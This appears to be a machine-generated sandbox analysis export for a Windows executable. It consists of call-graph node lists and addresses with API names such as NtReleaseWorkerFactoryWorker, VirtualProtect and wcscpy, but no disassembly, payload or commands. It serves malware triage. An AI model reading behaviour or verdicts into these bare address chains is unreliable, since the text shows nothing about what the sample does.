2102 1400015b7 2101->2102 2103 140001394 2 API calls 2102->2103 2104 1400015c6 2103->2104 2105 140001394 2 API calls 2104->2105 2106 1400015d5 2105->2106 2107 140001394 2 API calls 2106->2107 2108 1400015e4 2107->2108 2109 140001394 2 API calls 2108->2109 2110 1400015f3 2109->2110 2112 140005a60 malloc 2111->2112 2113 1400013b8 2112->2113 2114 1400013c6 NtReleaseWorkerFactoryWorker 2113->2114 2114->2040 2115 140002104 2116 140002111 EnterCriticalSection 2115->2116 2117 140002218 2115->2117 2118 14000220b LeaveCriticalSection 2116->2118 2122 14000212e 2116->2122 2119 140002272 2117->2119 2121 140002241 DeleteCriticalSection 2117->2121 2118->2117 2120 14000214d TlsGetValue GetLastError 2120->2122 2121->2119 2122->2118 2122->2120 2016 14000216f 2017 140002185 2016->2017 2018 140002178 InitializeCriticalSection 2016->2018 2018->2017 2019 140001a70 2020 14000199e 2019->2020 2024 140001a7d 2019->2024 2021 140001a0f 2020->2021 2022 1400019e9 VirtualProtect 2020->2022 2022->2020 2023 140001b53 2024->2019 2024->2023 2025 140001b36 2024->2025 2026 140001ba0 4 API calls 2025->2026 2026->2023 2838 140002050 2839 14000205e EnterCriticalSection 2838->2839 2840 1400020cf 2838->2840 2841 1400020c2 LeaveCriticalSection 2839->2841 2842 140002079 2839->2842 2841->2840 2842->2841 2843 140001fd0 2844 140001fe4 2843->2844 2845 140002033 2843->2845 2844->2845 2846 140001ffd EnterCriticalSection LeaveCriticalSection 2844->2846 2846->2845 2131 140001ab3 2132 140001a70 2131->2132 2132->2131 2133 14000199e 2132->2133 2134 140001b36 2132->2134 2137 140001b53 2132->2137 2136 140001a0f 2133->2136 2138 1400019e9 VirtualProtect 2133->2138 2135 140001ba0 4 API calls 2134->2135 2135->2137 2138->2133 1988 140001394 1992 140005a60 1988->1992 1990 1400013b8 1991 1400013c6 NtReleaseWorkerFactoryWorker 1990->1991 1993 140005a7e 1992->1993 1996 140005aab 1992->1996 1993->1990 1994 140005b53 1995 140005b6f malloc 1994->1995 1997 140005b90 1995->1997 1996->1993 1996->1994 1997->1993 2123 14000219e 2124 140002272 2123->2124 2125 1400021ab EnterCriticalSection 2123->2125 2126 140002265 LeaveCriticalSection 2125->2126 2128 1400021c8 2125->2128 2126->2124 2127 1400021e9 TlsGetValue GetLastError 2127->2128 2128->2126 2128->2127 2027 140001800 2028 140001812 2027->2028 2029 140001835 fprintf 2028->2029 2030 140001000 2031 14000108b __set_app_type 2030->2031 2032 140001040 2030->2032 2034 1400010b6 2031->2034 2032->2031 2033 1400010e5 2034->2033 2036 140001e00 2034->2036 2037 140005ff0 __setusermatherr 2036->2037 2129 140002320 strlen 2130 140002337 2129->2130 2139 140001140 2142 140001160 2139->2142 2141 140001156 2143 1400011b9 2142->2143 2144 14000118b 2142->2144 2145 1400011d3 2143->2145 2146 1400011c7 _amsg_exit 2143->2146 2144->2143 2147 1400011a0 Sleep 2144->2147 2148 140001201 _initterm 2145->2148 2149 14000121a 2145->2149 2146->2145 2147->2143 2147->2144 2148->2149 2165 140001880 2149->2165 2152 14000126a 2153 14000126f malloc 2152->2153 2154 14000128b 2153->2154 2156 1400012d0 2153->2156 2155 1400012a0 strlen malloc memcpy 2154->2155 2155->2155 2155->2156 2176 140003150 2156->2176 2158 140001315 2159 140001344 2158->2159 2160 140001324 2158->2160 2163 140001160 50 API calls 2159->2163 2161 140001338 2160->2161 2162 14000132d _cexit 2160->2162 2161->2141 2162->2161 2164 140001366 2163->2164 2164->2141 2166 140001247 SetUnhandledExceptionFilter 2165->2166 2167 1400018a2 2165->2167 2166->2152 2167->2166 2168 14000194d 2167->2168 2172 140001a20 2167->2172 2169 14000199e 2168->2169 2170 140001ba0 4 API calls 2168->2170 2169->2166 2171 1400019e9 VirtualProtect 2169->2171 2170->2168 2171->2169 2172->2169 2173 140001b53 2172->2173 2174 140001b36 2172->2174 2175 140001ba0 4 API calls 2174->2175 2175->2173 2179 140003166 2176->2179 2177 140003291 wcslen 2250 14000153f 2177->2250 2179->2177 2181 14000348e 2181->2158 2187 14000338c 2188 140003434 wcslen 2187->2188 2189 14000344a 2188->2189 2191 14000348c 2188->2191 2189->2191 2192 140003476 wcslen 2189->2192 2190 140003551 wcscpy wcscat 2194 140003583 2190->2194 2191->2190 2192->2189 2192->2191 2193 1400035d3 wcscpy wcscat 2196 140003609 2193->2196 2194->2193 2195 14000371e wcscpy wcscat 2197 140003757 2195->2197 2196->2195 2198 140003aab wcslen 2197->2198 2199 140003ab9 2198->2199 2200 140003aeb 2198->2200 2199->2200 2202 140003ad6 wcslen 2199->2202 2201 140003bfa wcscpy wcscat 2200->2201 2204 140003c2f 2201->2204 2202->2199 2202->2200 2203 140003c7f wcscpy wcscat 2206 140003cb8 2203->2206 2204->2203 2205 140003cf5 wcscpy wcscat 2208 140003d3c 2205->2208 2206->2205 2207 140003d8e wcscpy wcscat wcslen 2390 14000146d 2207->2390 2208->2207 2213 140003ea5 2476 1400014a9 2213->2476 2214 140003fe8 2216 14000145e 2 API calls 2214->2216 2223 140003f3c 2216->2223 2218 140003fd7 2220 14000145e 2 API calls 2218->2220 2219 1400056e7 2220->2223 2222 14000407a wcscpy wcscat wcslen 2235 140004150 2222->2235 2223->2219 2223->2222 2226 140003f30 2227 14000145e 2 API calls 2226->2227 2227->2223 2228 140004245 wcslen 2229 14000153f 2 API calls 2228->2229 2229->2235 2230 14000530a memcpy 2230->2235 2231 14000443b wcslen 2637 14000157b 2231->2637 2232 1400046ad wcslen 2233 14000153f 2 API calls 2232->2233 2233->2235 2235->2228 2235->2230 2235->2231 2235->2232 2236 140004fa1 wcscpy wcscat wcslen 2235->2236 2239 140004533 wcslen 2235->2239 2242 1400050e3 2235->2242 2243 14000546c memcpy 2235->2243 2244 1400026e0 9 API calls 2235->2244 2245 14000518e wcslen 2235->2245 2247 140004df5 wcscpy wcscat wcslen 2235->2247 2249 14000145e NtReleaseWorkerFactoryWorker malloc 2235->2249 2592 1400014d6 2235->2592 2665 140001521 2235->2665 2763 140001431 2235->2763 2237 140001422 2 API calls 2236->2237 2237->2235 2654 1400015a8 2239->2654 2242->2158 2243->2235 2244->2235 2246 1400015a8 2 API calls 2245->2246 2246->2235 2694 140001422 2247->2694 2249->2235 2251 140001394 2 API calls 2250->2251 2252 14000154e 2251->2252 2253 140001394 2 API calls 2252->2253 2254 14000155d 2253->2254 2255 140001394 2 API calls 2254->2255 2256 14000156c 2255->2256 2257 140001394 2 API calls 2256->2257 2258 14000157b 2257->2258 2259 140001394 2 API calls 2258->2259 2260 14000158a 2259->2260 2261 140001394 2 API calls 2260->2261 2262 140001599 2261->2262 2263 140001394 2 API calls 2262->2263 2264 1400015a8 2263->2264 2265 140001394 2 API calls 2264->2265 2266 1400015b7 2265->2266 2267 140001394 2 API calls 2266->2267 2268 1400015c6 2267->2268 2269 140001394 2 API calls 2268->2269 2270 1400015d5 2269->2270 2271 140001394 2 API calls 2270->2271 2272 1400015e4 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015f3 2273->2274 2274->2181 2275 140001503 2274->2275 2276 140001394 2 API calls 2275->2276 2277 14000150d 2276->2277 2278 140001394 2 API calls 2277->2278 2279 140001512 2278->2279 2280 140001394 2 API calls 2279->2280 2281 140001521 2280->2281 2282 140001394 2 API calls 2281->2282 2283 140001530 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000153f 2284->2285 2286 140001394 2 API calls 2285->2286 2287 14000154e 2286->2287 2288 140001394 2 API calls 2287->2288 2289 14000155d 2288->2289 2290 140001394 2 API calls 2289->2290 2291 14000156c 2290->2291 2292 140001394 2 API calls 2291->2292 2293 14000157b 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000158a 2294->2295 2296 140001394 2 API calls 2295->2296 2297 140001599 2296->2297 2298 140001394 2 API calls 2297->2298 2299 1400015a8 2298->2299 2300 140001394 2 API calls 2299->2300 2301 1400015b7 2300->2301 2302 140001394 2 API calls 2301->2302 2303 1400015c6 2302->2303 2304 140001394 2 API calls 2303->2304 2305 1400015d5 2304->2305 2306 140001394 2 API calls 2305->2306 2307 1400015e4 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015f3 2308->2309 2309->2187 2310 14000156c 2309->2310 2311 140001394 2 API calls 2310->2311 2312 14000157b 2311->2312 2313 140001394 2 API calls 2312->2313 2314 14000158a 2313->2314 2315 140001394 2 API calls 2314->2315 2316 140001599 2315->2316 2317 140001394 2 API calls 2316->2317 2318 1400015a8 2317->2318 2319 140001394 2 API calls 2318->2319 2320 1400015b7 2319->2320 2321 140001394 2 API calls 2320->2321 2322 1400015c6 2321->2322 2323 140001394 2 API calls 2322->2323 2324 1400015d5 2323->2324 2325 140001394 2 API calls 2324->2325 2326 1400015e4 2325->2326 2327 140001394 2 API calls 2326->2327 2328 1400015f3 2327->2328 2328->2187 2329 14000145e 2328->2329 2330 140001394 2 API calls 2329->2330 2331 14000146d 2330->2331 2332 140001394 2 API calls 2331->2332 2333 14000147c 2332->2333 2334 140001394 2 API calls 2333->2334 2335 14000148b 2334->2335 2336 140001394 2 API calls 2335->2336 2337 14000149a 2336->2337 2338 140001394 2 API calls 2337->2338 2339 1400014a9 2338->2339 2340 140001394 2 API calls 2339->2340 2341 1400014b8 2340->2341 2342 140001394 2 API calls 2341->2342 2343 1400014c7 2342->2343 2344 140001394 2 API calls 2343->2344 2345 1400014d6 2344->2345 2346 1400014e5 2345->2346 2347 140001394 2 API calls 2345->2347 2348 140001394 2 API calls 2346->2348 2347->2346 2349 1400014ef 2348->2349 2350 1400014f4 2349->2350 2351 140001394 2 API calls 2349->2351 2352 140001394 2 API calls 2350->2352 2351->2350 2353 1400014fe 2352->2353 2354 140001503 2353->2354 2355 140001394 2 API calls 2353->2355 2356 140001394 2 API calls 2354->2356 2355->2354 2357 14000150d 2356->2357 2358 140001394 2 API calls 2357->2358 2359 140001512 2358->2359 2360 140001394 2 API calls 2359->2360 2361 140001521 2360->2361 2362 140001394 2 API calls 2361->2362 2363 140001530 2362->2363 2364 140001394 2 API calls 2363->2364 2365 14000153f 2364->2365 2366 140001394 2 API calls 2365->2366 2367 14000154e 2366->2367 2368 140001394 2 API calls 2367->2368 2369 14000155d 2368->2369 2370 140001394 2 API calls 2369->2370 2371 14000156c 2370->2371 2372 140001394 2 API calls 2371->2372 2373 14000157b 2372->2373 2374 140001394 2 API calls 2373->2374 2375 14000158a 2374->2375 2376 140001394 2 API calls 2375->2376 2377 140001599 2376->2377 2378 140001394 2 API calls 2377->2378 2379 1400015a8 2378->2379 2380 140001394 2 API calls 2379->2380 2381 1400015b7 2380->2381 2382 140001394 2 API calls 2381->2382 2383 1400015c6 2382->2383 2384 140001394 2 API calls 2383->2384 2385 1400015d5 2384->2385 2386 140001394 2 API calls 2385->2386 2387 1400015e4 2386->2387 2388 140001394 2 API calls 2387->2388 2389 1400015f3 2388->2389 2389->2187 2391 140001394 2 API calls 2390->2391 2392 14000147c 2391->2392 2393 140001394 2 API calls 2392->2393 2394 14000148b 2393->2394 2395 140001394 2 API calls 2394->2395 2396 14000149a 2395->2396 2397 140001394 2 API calls 2396->2397 2398 1400014a9 2397->2398 2399 140001394 2 API calls 2398->2399 2400 1400014b8 2399->2400 2401 140001394 2 API calls 2400->2401 2402 1400014c7 2401->2402 2403 140001394 2 API calls 2402->2403 2404 1400014d6 2403->2404 2405 1400014e5 2404->2405 2406 140001394 2 API calls 2404->2406 2407 140001394 2 API calls 2405->2407 2406->2405 2408 1400014ef 2407->2408 2409 1400014f4 2408->2409 2410 140001394 2 API calls 2408->2410 2411 140001394 2 API calls 2409->2411 2410->2409 2412 1400014fe 2411->2412 2413 140001503 2412->2413 2414 140001394 2 API calls 2412->2414 2415 140001394 2 API calls 2413->2415 2414->2413 2416 14000150d 2415->2416 2417 140001394 2 API calls 2416->2417 2418 140001512 2417->2418 2419 140001394 2 API calls 2418->2419 2420 140001521 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001530 2421->2422 2423 140001394 2 API calls 2422->2423 2424 14000153f 2423->2424 2425 140001394 2 API calls 2424->2425 2426 14000154e 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000155d 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000156c 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000157b 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000158a 2433->2434 2435 140001394 2 API calls 2434->2435 2436 140001599 2435->2436 2437 140001394 2 API calls 2436->2437 2438 1400015a8 2437->2438 2439 140001394 2 API calls 2438->2439 2440 1400015b7 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015c6 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015d5 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015e4 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015f3 2447->2448 2448->2223 2449 140001530 2448->2449 2450 140001394 2 API calls 2449->2450 2451 14000153f 2450->2451 2452 140001394 2 API calls 2451->2452 2453 14000154e 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000155d 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000156c 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000157b 2458->2459 2460 140001394 2 API calls 2459->2460 2461 14000158a 2460->2461 2462 140001394 2 API calls 2461->2462 2463 140001599 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015a8 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015b7 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015c6 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015d5 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015e4 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015f3 2474->2475 2475->2213 2475->2214 2477 140001394 2 API calls 2476->2477 2478 1400014b8 2477->2478 2479 140001394 2 API calls 2478->2479 2480 1400014c7 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014d6 2481->2482 2483 1400014e5 2482->2483 2484 140001394 2 API calls 2482->2484 2485 140001394 2 API calls 2483->2485 2484->2483 2486 1400014ef 2485->2486 2487 1400014f4 2486->2487 2488 140001394 2 API calls 2486->2488 2489 140001394 2 API calls 2487->2489 2488->2487 2490 1400014fe 2489->2490 2491 140001503 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 14000150d 2493->2494 2495 140001394 2 API calls 2494->2495 2496 140001512 2495->2496 2497 140001394 2 API calls 2496->2497 2498 140001521 2497->2498 2499 140001394 2 API calls 2498->2499 2500 140001530 2499->2500 2501 140001394 2 API calls 2500->2501 2502 14000153f 2501->2502 2503 140001394 2 API calls 2502->2503 2504 14000154e 2503->2504 2505 140001394 2 API calls 2504->2505 2506 14000155d 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000156c 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000157b 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000158a 2511->2512 2513 140001394 2 API calls 2512->2513 2514 140001599 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015a8 2515->2516 2517 140001394 2 API calls 2516->2517 2518 1400015b7 2517->2518 2519 140001394 2 API calls 2518->2519 2520 1400015c6 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015d5 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015e4 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015f3 2525->2526 2526->2218 2527 140001440 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000144f 2528->2529 2530 140001394 2 API calls 2529->2530 2531 14000145e 2530->2531 2532 140001394 2 API calls 2531->2532 2533 14000146d 2532->2533 2534 140001394 2 API calls 2533->2534 2535 14000147c 2534->2535 2536 140001394 2 API calls 2535->2536 2537 14000148b 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000149a 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400014a9 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400014b8 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400014c7 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400014d6 2546->2547 2548 1400014e5 2547->2548 2549 140001394 2 API calls 2547->2549 2550 140001394 2 API calls 2548->2550 2549->2548 2551 1400014ef 2550->2551 2552 1400014f4 2551->2552 2553 140001394 2 API calls 2551->2553 2554 140001394 2 API calls 2552->2554 2553->2552 2555 1400014fe 2554->2555 2556 140001503 2555->2556 2557 140001394 2 API calls 2555->2557 2558 140001394 2 API calls 2556->2558 2557->2556 2559 14000150d 2558->2559 2560 140001394 2 API calls 2559->2560 2561 140001512 2560->2561 2562 140001394 2 API calls 2561->2562 2563 140001521 2562->2563 2564 140001394 2 API calls 2563->2564 2565 140001530 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000153f 2566->2567 2568 140001394 2 API calls 2567->2568 2569 14000154e 2568->2569 2570 140001394 2 API calls 2569->2570 2571 14000155d 2570->2571 2572 140001394 2 API calls 2571->2572 2573 14000156c 2572->2573 2574 140001394 2 API calls 2573->2574 2575 14000157b 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000158a 2576->2577 2578 140001394 2 API calls 2577->2578 2579 140001599 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015a8 2580->2581 2582 140001394 2 API calls 2581->2582 2583 1400015b7 2582->2583 2584 140001394 2 API calls 2583->2584 2585 1400015c6 2584->2585 2586 140001394 2 API calls 2585->2586 2587 1400015d5 2586->2587 2588 140001394 2 API calls 2587->2588 2589 1400015e4 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015f3 2590->2591 2591->2218 2591->2226 2593 1400014e5 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014ef 2595->2596 2597 1400014f4 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 1400014fe 2599->2600 2601 140001503 2600->2601 2602 140001394 2 API calls 2600->2602 2603 140001394 2 API calls 2601->2603 2602->2601 2604 14000150d 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001512 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001521 2607->2608 2609 140001394 2 API calls 2608->2609 2610 140001530 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000153f 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000154e 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000155d 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000156c 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000157b 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000158a 2621->2622 2623 140001394 2 API calls 2622->2623 2624 140001599 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015a8 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015b7 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015c6 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015d5 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015e4 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015f3 2635->2636 2636->2235 2638 140001394 2 API calls 2637->2638 2639 14000158a 2638->2639 2640 140001394 2 API calls 2639->2640 2641 140001599 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015a8 2642->2643 2644 140001394 2 API calls 2643->2644 2645 1400015b7 2644->2645 2646 140001394 2 API calls 2645->2646 2647 1400015c6 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015d5 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015e4 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015f3 2652->2653 2653->2235 2655 140001394 2 API calls 2654->2655 2656 1400015b7 2655->2656 2657 140001394 2 API calls 2656->2657 2658 1400015c6 2657->2658 2659 140001394 2 API calls 2658->2659 2660 1400015d5 2659->2660 2661 140001394 2 API calls 2660->2661 2662 1400015e4 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400015f3 2663->2664 2664->2235 2666 140001394 2 API calls 2665->2666 2667 140001530 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000153f 2668->2669 2670 140001394 2 API calls 2669->2670 2671 14000154e 2670->2671 2672 140001394 2 API calls 2671->2672 2673 14000155d 2672->2673 2674 140001394 2 API calls 2673->2674 2675 14000156c 2674->2675 2676 140001394 2 API calls 2675->2676 2677 14000157b 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000158a 2678->2679 2680 140001394 2 API calls 2679->2680 2681 140001599 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015a8 2682->2683 2684 140001394 2 API calls 2683->2684 2685 1400015b7 2684->2685 2686 140001394 2 API calls 2685->2686 2687 1400015c6 2686->2687 2688 140001394 2 API calls 2687->2688 2689 1400015d5 2688->2689 2690 140001394 2 API calls 2689->2690 2691 1400015e4 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015f3 2692->2693 2693->2235 2695 140001394 2 API calls 2694->2695 2696 140001431 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001440 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000144f 2699->2700 2701 140001394 2 API calls 2700->2701 2702 14000145e 2701->2702 2703 140001394 2 API calls 2702->2703 2704 14000146d 2703->2704 2705 140001394 2 API calls 2704->2705 2706 14000147c 2705->2706 2707 140001394 2 API calls 2706->2707 2708 14000148b 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000149a 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400014a9 2711->2712 2713 140001394 2 API calls 2712->2713 2714 1400014b8 2713->2714 2715 140001394 2 API calls 2714->2715 2716 1400014c7 2715->2716 2717 140001394 2 API calls 2716->2717 2718 1400014d6 2717->2718 2719 1400014e5 2718->2719 2720 140001394 2 API calls 2718->2720 2721 140001394 2 API calls 2719->2721 2720->2719 2722 1400014ef 2721->2722 2723 1400014f4 2722->2723 2724 140001394 2 API calls 2722->2724 2725 140001394 2 API calls 2723->2725 2724->2723 2726 1400014fe 2725->2726 2727 140001503 2726->2727 2728 140001394 2 API calls 2726->2728 2729 140001394 2 API calls 2727->2729 2728->2727 2730 14000150d 2729->2730 2731 140001394 2 API calls 2730->2731 2732 140001512 2731->2732 2733 140001394 2 API calls 2732->2733 2734 140001521 2733->2734 2735 140001394 2 API calls 2734->2735 2736 140001530 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000153f 2737->2738 2739 140001394 2 API calls 2738->2739 2740 14000154e 2739->2740 2741 140001394 2 API calls 2740->2741 2742 14000155d 2741->2742 2743 140001394 2 API calls 2742->2743 2744 14000156c 2743->2744 2745 140001394 2 API calls 2744->2745 2746 14000157b 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000158a 2747->2748 2749 140001394 2 API calls 2748->2749 2750 140001599 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015a8 2751->2752 2753 140001394 2 API calls 2752->2753 2754 1400015b7 2753->2754 2755 140001394 2 API calls 2754->2755 2756 1400015c6 2755->2756 2757 140001394 2 API calls 2756->2757 2758 1400015d5 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015e4 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015f3 2761->2762 2762->2235 2764 140001394 2 API calls 2763->2764 2765 140001440 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000144f 2766->2767 2768 140001394 2 API calls 2767->2768 2769 14000145e 2768->2769 2770 140001394 2 API calls 2769->2770 2771 14000146d 2770->2771 2772 140001394 2 API calls 2771->2772 2773 14000147c 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000148b 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000149a 2776->2777 2778 140001394 2 API calls 2777->2778 2779 1400014a9 2778->2779 2780 140001394 2 API calls 2779->2780 2781 1400014b8 2780->2781 2782 140001394 2 API calls 2781->2782 2783 1400014c7 2782->2783 2784 140001394 2 API calls 2783->2784 2785 1400014d6 2784->2785 2786 1400014e5 2785->2786 2787 140001394 2 API calls 2785->2787 2788 140001394 2 API calls 2786->2788 2787->2786 2789 1400014ef 2788->2789 2790 1400014f4 2789->2790 2791 140001394 2 API calls 2789->2791 2792 140001394 2 API calls 2790->2792 2791->2790 2793 1400014fe 2792->2793 2794 140001503 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 14000150d 2796->2797 2798 140001394 2 API calls 2797->2798 2799 140001512 2798->2799 2800 140001394 2 API calls 2799->2800 2801 140001521 2800->2801 2802 140001394 2 API calls 2801->2802 2803 140001530 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000153f 2804->2805 2806 140001394 2 API calls 2805->2806 2807 14000154e 2806->2807 2808 140001394 2 API calls 2807->2808 2809 14000155d 2808->2809 2810 140001394 2 API calls 2809->2810 2811 14000156c 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000157b 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000158a 2814->2815 2816 140001394 2 API calls 2815->2816 2817 140001599 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015a8 2818->2819 2820 140001394 2 API calls 2819->2820 2821 1400015b7 2820->2821 2822 140001394 2 API calls 2821->2822 2823 1400015c6 2822->2823 2824 140001394 2 API calls 2823->2824 2825 1400015d5 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015e4 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015f3 2828->2829 2829->2235

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00000001400057E1 1 Function_0000000140001AE4 33 Function_0000000140001D40 1->33 76 Function_0000000140001BA0 1->76 2 Function_00000001400014E5 72 Function_0000000140001394 2->72 3 Function_00000001400010F0 4 Function_00000001400030F1 5 Function_00000001400014F4 5->72 6 Function_0000000140002500 7 Function_0000000140001800 65 Function_0000000140002290 7->65 8 Function_0000000140001000 9 Function_0000000140001E00 8->9 39 Function_0000000140001750 8->39 80 Function_0000000140001FB0 8->80 87 Function_0000000140001FC0 8->87 10 Function_0000000140002F00 55 Function_0000000140001370 10->55 11 Function_0000000140005801 12 Function_0000000140005901 13 Function_0000000140001503 13->72 14 Function_0000000140001404 14->72 15 Function_0000000140002104 16 Function_0000000140001E10 17 Function_0000000140005D10 37 Function_0000000140005A50 17->37 18 Function_0000000140003110 19 Function_0000000140001512 19->72 20 Function_0000000140002420 21 Function_0000000140002320 22 Function_0000000140001521 22->72 23 Function_0000000140005721 24 Function_0000000140005821 25 Function_0000000140001422 25->72 26 Function_0000000140001530 26->72 27 Function_0000000140005A30 28 Function_0000000140003130 29 Function_0000000140001431 29->72 30 Function_000000014000153F 30->72 31 Function_0000000140001440 31->72 32 Function_0000000140001140 48 Function_0000000140001160 32->48 33->65 34 Function_0000000140005841 35 Function_0000000140001F47 56 Function_0000000140001870 35->56 36 Function_0000000140002050 38 Function_0000000140003150 38->10 38->13 38->22 38->25 38->26 38->29 38->30 38->31 38->37 44 Function_000000014000145E 38->44 46 Function_0000000140002660 38->46 52 Function_000000014000156C 38->52 53 Function_000000014000146D 38->53 38->55 62 Function_000000014000157B 38->62 77 Function_00000001400015A8 38->77 78 Function_00000001400014A9 38->78 86 Function_00000001400016C0 38->86 97 Function_00000001400014D6 38->97 100 Function_00000001400026E0 38->100 40 Function_0000000140001650 41 Function_0000000140005751 42 Function_0000000140003051 43 Function_000000014000155D 43->72 44->72 45 Function_0000000140002460 47 Function_0000000140005A60 47->37 48->38 48->48 48->56 63 Function_0000000140001880 48->63 64 Function_0000000140001F90 48->64 48->86 49 Function_0000000140001760 101 Function_00000001400020E0 49->101 50 Function_0000000140005861 51 Function_0000000140001E65 51->56 52->72 53->72 54 Function_000000014000216F 57 Function_0000000140001A70 57->33 57->76 58 Function_0000000140003070 59 Function_0000000140005870 60 Function_0000000140005771 61 Function_0000000140005971 62->72 63->20 63->33 63->46 63->76 66 Function_0000000140002590 67 Function_0000000140003090 68 Function_0000000140002691 69 Function_0000000140005791 70 Function_0000000140005891 71 Function_0000000140005991 72->17 72->47 73 Function_0000000140002194 73->56 74 Function_000000014000219E 75 Function_0000000140001FA0 76->33 79 Function_00000001400023B0 76->79 93 Function_00000001400024D0 76->93 77->72 78->72 81 Function_00000001400022B0 82 Function_00000001400026B0 83 Function_00000001400030B1 84 Function_00000001400057B1 85 Function_0000000140001AB3 85->33 85->76 88 Function_00000001400058C1 89 Function_0000000140001AC3 89->33 89->76 90 Function_00000001400014C7 90->72 91 Function_00000001400026D0 92 Function_0000000140001FD0 94 Function_00000001400017D0 95 Function_00000001400059D1 96 Function_0000000140001AD4 96->33 96->76 97->72 98 Function_00000001400022E0 99 Function_00000001400017E0 99->101 100->2 100->5 100->13 100->19 100->37 100->43 100->44 100->46 100->55 100->78 100->90

                                                        Executed Functions

                                                        Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • NtReleaseWorkerFactoryWorker.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
